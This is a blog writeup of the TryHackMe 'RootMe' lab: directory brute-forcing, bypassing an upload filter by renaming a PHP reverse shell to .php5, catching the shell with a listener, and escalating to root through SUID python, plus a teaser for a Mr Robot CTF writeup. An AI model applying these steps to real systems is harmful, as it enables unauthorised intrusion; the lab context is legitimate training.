Skip to main content

RootMe CTF [Writeup] TryHackMe

 

Deploy The Machine

The machine RootMe is available at TryHackMe
Start the machine so that target IP is available.


Reconnaissance

For the number of open ports run nmap.

There are 2 ports are open: ssh and http.

Apache version 2.4.29 is running. I get this info thru wappalyzer.

secure shell or ssh is running on port 22.


Apache info also can get by running gobuster.


Here for hidden directory I am running gobuster tool

$ gobuster dir -u http://10.10.51.16/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Correct answer for hidden directory is /panel/



This means we can upload any file in this /panel page. I think this is the way to getting the shell. reverse shell or binding shell? For that I need to do some google. Oh there is reverse shell mention in that room also. So need to find reverse shell code thru google and upload from that. And access that server's shell thru my machine.

Getting a shell

I need to upload php reverse shell code in upload section. and need to make a listener in my pc.

I use this file https://github.com/pentestmonkey/php-reverse-shell

Turn to upload the file. But I got this error. I think It does not give permission to upload php.


I change .php to .php5 and then file is uploaded.


Create a listener in attack device then click on this reverse shell file. Then it provides connection back to attack machine.



Either you can run following command in terminal or can click into recently uploaded malicious code thru /uploads. Then the reverse shell php code executed. At the same time we are listening on port 1234 in attack machine. Hence we got the reverse shell.



Now search and find user.txt, there we got flag. I got user.txt in /usr/www

Privilege Escalation

Q. Search for files with SUID permission, which file is weird?

Ans: /usr/bin/python

I found python is install in our target with SUID bit. So that we can use it to get higher privilege.


We can use https://gtfobins.github.io 

as mentioned in the hint.

Now I am searching for python and there I get SUID section and code. With the hint in THM this code can do something for us.


In our case we do not need to run first command. Run second command which will give root shell to us.

First navigate into /usr/bin and then run the command


Now I got root. Its time to search and find root flag.

First go into root's home directory and there is the flag


Okey everything is done. Now terminate the target machine.

Happy Hackers !!




Labels:

Comments

Post a Comment

Popular posts from this blog

Mr Robot CTF Writeup TryHackMe | VulnHub

 Overview <mr. robot> Hello friend. If you've come, you've come for a reason. You may not be able to explain it yet, but there's a part of you that's exhausted with this world... a world that decides where you work, who you see, and how you empty and fill your depressing bank account. Even the Internet connection you're using to read this is costing you, slowly chipping away at your existence. There are things you want to say. Soon I will give you a voice. Today your education begins. This machine have WordPress website. After finding available directories in this website, login into admin panel of that wp-website using dictionary attack. Wordlist is available in robots.txt, also first flag is there. Since the wordpress in written in php, so use php reverse shell to enter into target machine. There is a robot user and password in raw-md5 hash form. Crack the hash and be robot, where second flag is found. Now using privilege escalation be the root. nmap with S...
Post a Comment
Read more